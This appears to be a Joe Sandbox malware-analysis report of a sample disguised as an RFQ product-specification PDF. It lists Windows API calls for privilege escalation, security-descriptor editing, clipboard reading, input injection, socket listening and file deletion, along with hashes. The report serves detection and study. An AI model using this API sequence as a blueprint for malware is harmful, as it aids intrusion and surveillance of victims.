                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 4125248594-2988720461
                                                                                                                • Opcode ID: 3bb0c2e90ca243897c621e772d3c22d01d8970f4c612e77035c2ca8a829a2fe5
                                                                                                                • Instruction ID: 140283d7f91289994da81f05f1258c80fdaf3e0930b3c0a5b778182e0b3c43a0
                                                                                                                • Opcode Fuzzy Hash: 3bb0c2e90ca243897c621e772d3c22d01d8970f4c612e77035c2ca8a829a2fe5
                                                                                                                • Instruction Fuzzy Hash: 90314171B81219BEEF206BE55C49FBF7FACEB44B60F510066FA01E61D1C6B05901EA60
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AA170D
                                                                                                                  • Part of subcall function 00AA16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AA173A
                                                                                                                  • Part of subcall function 00AA16C3: GetLastError.KERNEL32 ref: 00AA174A
                                                                                                                • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00AA1286
                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00AA12A8
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00AA12B9
                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AA12D1
                                                                                                                • GetProcessWindowStation.USER32 ref: 00AA12EA
                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 00AA12F4
                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AA1310
                                                                                                                  • Part of subcall function 00AA10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AA11FC), ref: 00AA10D4
                                                                                                                  • Part of subcall function 00AA10BF: CloseHandle.KERNEL32(?,?,00AA11FC), ref: 00AA10E9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                • String ID: $default$winsta0
                                                                                                                • API String ID: 22674027-1027155976
                                                                                                                • Opcode ID: f3b5faf03bfd7751b3f8c3eb0727611bc51782c4725698d57e77d82809f0e39a
                                                                                                                • Instruction ID: 39df0518a39c854d5e1cb360e3d83456ea7f7414dbbedffd9305f48669a92f18
                                                                                                                • Opcode Fuzzy Hash: f3b5faf03bfd7751b3f8c3eb0727611bc51782c4725698d57e77d82809f0e39a
                                                                                                                • Instruction Fuzzy Hash: B9816AB1A00209BBDF21DFA8DD49BEE7BB9EF09714F14412AF912A71A0D7358945CB20
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AA1114
                                                                                                                  • Part of subcall function 00AA10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA1120
                                                                                                                  • Part of subcall function 00AA10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA112F
                                                                                                                  • Part of subcall function 00AA10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA1136
                                                                                                                  • Part of subcall function 00AA10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AA114D
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AA0BCC
                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AA0C00
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00AA0C17
                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00AA0C51
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AA0C6D
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00AA0C84
                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00AA0C8C
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00AA0C93
                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AA0CB4
                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00AA0CBB
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AA0CEA
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AA0D0C
                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AA0D1E
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AA0D45
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0D4C
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AA0D55
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0D5C
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AA0D65
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0D6C
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00AA0D78
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0D7F
                                                                                                                  • Part of subcall function 00AA1193: GetProcessHeap.KERNEL32(00000008,00AA0BB1,?,00000000,?,00AA0BB1,?), ref: 00AA11A1
                                                                                                                  • Part of subcall function 00AA1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00AA0BB1,?), ref: 00AA11A8
                                                                                                                  • Part of subcall function 00AA1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00AA0BB1,?), ref: 00AA11B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 4175595110-0
                                                                                                                • Opcode ID: 72917a0f6bd7577d0cefefd1ade8e95c107fc4133920e6f708bb5073a424dcf2
                                                                                                                • Instruction ID: 644c621f51f832a1f3133e8d04648fb2f4b22620804c7970bc8dd871abdfbfe9
                                                                                                                • Opcode Fuzzy Hash: 72917a0f6bd7577d0cefefd1ade8e95c107fc4133920e6f708bb5073a424dcf2
                                                                                                                • Instruction Fuzzy Hash: 28715B7290121AABDF10DFE4DC44FAEBBB8BF05320F144619F915A7291D775AA06CBA0
                                                                                                                APIs
                                                                                                                • OpenClipboard.USER32(00ADCC08), ref: 00ABEB29
                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00ABEB37
                                                                                                                • GetClipboardData.USER32(0000000D), ref: 00ABEB43
                                                                                                                • CloseClipboard.USER32 ref: 00ABEB4F
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00ABEB87
                                                                                                                • CloseClipboard.USER32 ref: 00ABEB91
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00ABEBBC
                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00ABEBC9
                                                                                                                • GetClipboardData.USER32(00000001), ref: 00ABEBD1
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00ABEBE2
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00ABEC22
                                                                                                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 00ABEC38
                                                                                                                • GetClipboardData.USER32(0000000F), ref: 00ABEC44
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00ABEC55
                                                                                                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00ABEC77
                                                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00ABEC94
                                                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00ABECD2
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00ABECF3
                                                                                                                • CountClipboardFormats.USER32 ref: 00ABED14
                                                                                                                • CloseClipboard.USER32 ref: 00ABED59
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 420908878-0
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AB69BE
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB6A12
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AB6A4E
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AB6A75
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00AB6AB2
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00AB6ADF
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                • API String ID: 3830820486-3289030164
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00AB9663
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00AB96A1
                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00AB96BB
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00AB96D3
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB96DE
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00AB96FA
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB974A
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00B06B7C), ref: 00AB9768
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AB9772
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB977F
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB978F
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1409584000-438819550
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00AB97BE
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00AB9819
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB9824
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00AB9840
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB9890
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00B06B7C), ref: 00AB98AE
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AB98B8
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB98C5
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB98D5
                                                                                                                  • Part of subcall function 00AADAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AADB00
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 2640511053-438819550
                                                                                                                APIs
                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00AB8257
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00AB8267
                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AB8273
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AB8310
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB8324
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB8356
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AB838C
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB8395
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1464919966-438819550
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A43AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A43A97,?,?,00A42E7F,?,?,?,00000000), ref: 00A43AC2
                                                                                                                  • Part of subcall function 00AAE199: GetFileAttributesW.KERNEL32(?,00AACF95), ref: 00AAE19A
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AAD122
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00AAD1DD
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00AAD1F0
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00AAD20D
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AAD237
                                                                                                                  • Part of subcall function 00AAD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00AAD21C,?,?), ref: 00AAD2B2
                                                                                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 00AAD253
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AAD264
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 1946585618-1173974218
                                                                                                                APIs
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AA170D
                                                                                                                  • Part of subcall function 00AA16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AA173A
                                                                                                                  • Part of subcall function 00AA16C3: GetLastError.KERNEL32 ref: 00AA174A
                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00AAE932
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                • String ID: $ $@$SeShutdownPrivilege
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00AC1276
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC1283
                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00AC12BA
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC12C5
                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AC12F4
                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00AC1303
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC130D
                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AC133C
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00A7B9D4
                                                                                                                • _free.LIBCMT ref: 00A7B9F8
                                                                                                                • _free.LIBCMT ref: 00A7BB7F
                                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00AE3700), ref: 00A7BB91
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00B1121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A7BC09
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00B11270,000000FF,?,0000003F,00000000,?), ref: 00A7BC36
                                                                                                                • _free.LIBCMT ref: 00A7BD4B
                                                                                                                Similarity
                                                                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A43AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A43A97,?,?,00A42E7F,?,?,?,00000000), ref: 00A43AC2
                                                                                                                  • Part of subcall function 00AAE199: GetFileAttributesW.KERNEL32(?,00AACF95), ref: 00AAE19A
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AAD420
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00AAD470
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AAD481
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AAD498
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AAD4A1
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                • String ID: \*.*
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: __floor_pentium4
                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                APIs
                                                                                                                • _wcslen.LIBCMT ref: 00AB64DC
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00AB6639
                                                                                                                • CoCreateInstance.OLE32(00ADFCF8,00000000,00000001,00ADFB68,?), ref: 00AB6650
                                                                                                                • CoUninitialize.OLE32 ref: 00AB68D4
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                • String ID: .lnk
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(?,?,00000000), ref: 00AC22E8
                                                                                                                  • Part of subcall function 00ABE4EC: GetWindowRect.USER32(?,?), ref: 00ABE504
                                                                                                                • GetDesktopWindow.USER32 ref: 00AC2312
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AC2319
                                                                                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00AC2355
                                                                                                                • GetCursorPos.USER32(?), ref: 00AC2381
                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00AC23DF
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                • String ID:
                                                                                                                • API String ID: 2387181109-0
                                                                                                                • Opcode ID: 684a4b7e299d75049190b54e9190bf00759286f97e6738aeaf192f25c2599464
                                                                                                                • Instruction ID: c7c0eeeb289dd09f1948d2fb83abe96bb8d8096785411b38e1347eabf25a59d3
                                                                                                                • Opcode Fuzzy Hash: 684a4b7e299d75049190b54e9190bf00759286f97e6738aeaf192f25c2599464
                                                                                                                • Instruction Fuzzy Hash: 4631CF72505356ABC720DF54D845F9BB7A9FF84710F00091EF9859B281DB34EA09CB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00AB9B78
                                                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00AB9C8B
                                                                                                                  • Part of subcall function 00AB3874: GetInputState.USER32 ref: 00AB38CB
                                                                                                                  • Part of subcall function 00AB3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB3966
                                                                                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00AB9BA8
                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00AB9C75
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1972594611-438819550
                                                                                                                • Opcode ID: c88eeaed3838102fc076f02ca122d1593b332cde71f0bac54b9d9874cffabca6
                                                                                                                • Instruction ID: 12f37d0fbeef038c0e8bf8feee78f4127974a5617579e9efbc3ecafb1b1c2327
                                                                                                                • Opcode Fuzzy Hash: c88eeaed3838102fc076f02ca122d1593b332cde71f0bac54b9d9874cffabca6
                                                                                                                • Instruction Fuzzy Hash: 88417F7194420AAFDF14DFA4C989AEFBBB8EF46310F244156E905A7192EB309E44CF61
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00A59A4E
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00A59B23
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 00A59B36
                                                                                                                Similarity
                                                                                                                • API ID: Color$LongProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3131106179-0
                                                                                                                • Opcode ID: 74182a5ee46817a70e4effb75f1501f8f4aceb311dc121ac446bfe93dc2c92cb
                                                                                                                • Instruction ID: 4b77cd35bec64cdbebb23428a8379cda8c500e624c54753e0cd09385694465f2
                                                                                                                • Opcode Fuzzy Hash: 74182a5ee46817a70e4effb75f1501f8f4aceb311dc121ac446bfe93dc2c92cb
                                                                                                                • Instruction Fuzzy Hash: 91A109B0218544EEEB259B3C9D48DBF36EDFB42382B15410AFA02DE695CA359D06D272
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AC304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AC307A
                                                                                                                  • Part of subcall function 00AC304E: _wcslen.LIBCMT ref: 00AC309B
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00AC185D
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC1884
                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00AC18DB
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC18E6
                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AC1915
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 1601658205-0
                                                                                                                • Opcode ID: 497c3b6dac50549d0951312e31ead80041a3b4bd6d2090710f87eeefbb835b91
                                                                                                                • Instruction ID: 9b08eecb50ebc5271bd8a2e27ac01850aad03eed6c7cf46e78d0f971830bd4e3
                                                                                                                • Opcode Fuzzy Hash: 497c3b6dac50549d0951312e31ead80041a3b4bd6d2090710f87eeefbb835b91
                                                                                                                • Instruction Fuzzy Hash: 0F51C175A00210AFDB10EF24C986F2AB7E5AB85718F04849CF90A5F383D771AD41CBA1
                                                                                                                APIs
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                • String ID:
                                                                                                                • API String ID: 292994002-0
                                                                                                                • Opcode ID: 622918ee6761014b6405a3eaa0af6d2c45ddb8763f0e9ab74df58a3249b991a4
                                                                                                                • Instruction ID: e853ae1bc92fb3eef08003c84e26d0cad495d469c9ad878a4a31a4e1c62963c0
                                                                                                                • Opcode Fuzzy Hash: 622918ee6761014b6405a3eaa0af6d2c45ddb8763f0e9ab74df58a3249b991a4
                                                                                                                • Instruction Fuzzy Hash: 8421F4317512016FD7208F2AC884F6A7BE5EF95325F58806AE84BCB351DB71EC42CB90
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                • API String ID: 0-1546025612
                                                                                                                • Opcode ID: 7af6be4f12d9990e13e64013f579adec83cec79ae4992d4904bd6ca8fdd57d70
                                                                                                                • Instruction ID: 4706602a42bc97cf6be88d3810d25877371fe1e10ac4e5dcb6ef4567b1f21b0f
                                                                                                                • Opcode Fuzzy Hash: 7af6be4f12d9990e13e64013f579adec83cec79ae4992d4904bd6ca8fdd57d70
                                                                                                                • Instruction Fuzzy Hash: D4A29F74E0061ACBDF24DF58D9407EEB7B1BF94314F2481AAE815AB285EB749D81CF90
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00ACA6AC
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00ACA6BA
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00ACA79C
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00ACA7AB
                                                                                                                  • Part of subcall function 00A5CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00A83303,?), ref: 00A5CE8A
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1991900642-0
                                                                                                                • Opcode ID: 2e1239da7fc0992ca89c60c7c70ecc02bd98263c259992668b26f1b242622804
                                                                                                                • Instruction ID: d30378f35ebc94e75b707fe775f8be82bb0fe5694615d70042d631b042ba8f0d
                                                                                                                • Opcode Fuzzy Hash: 2e1239da7fc0992ca89c60c7c70ecc02bd98263c259992668b26f1b242622804
                                                                                                                • Instruction Fuzzy Hash: 81514975508301AFD710EF24C986E6BBBE8FF89754F40491DF98A97252EB30D904CB92
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00AAAAAC
                                                                                                                • SetKeyboardState.USER32(00000080), ref: 00AAAAC8
                                                                                                                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00AAAB36
                                                                                                                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00AAAB88
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: c062ffbeb78d72bc58f545834f21f40f0f1ab571260312014e443bc350a8dcc8
                                                                                                                • Instruction ID: bc736056f41af5e32e865af9581e9d64777148ab69fbf4febd128caa7908e9b4
                                                                                                                • Opcode Fuzzy Hash: c062ffbeb78d72bc58f545834f21f40f0f1ab571260312014e443bc350a8dcc8
                                                                                                                • Instruction Fuzzy Hash: B731E330A80648AEEB35CB64CC05BFA7BE6EB66320F04821AE581975E1D3758D85D772
                                                                                                                APIs
                                                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00ABCE89
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 00ABCEEA
                                                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 00ABCEFE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
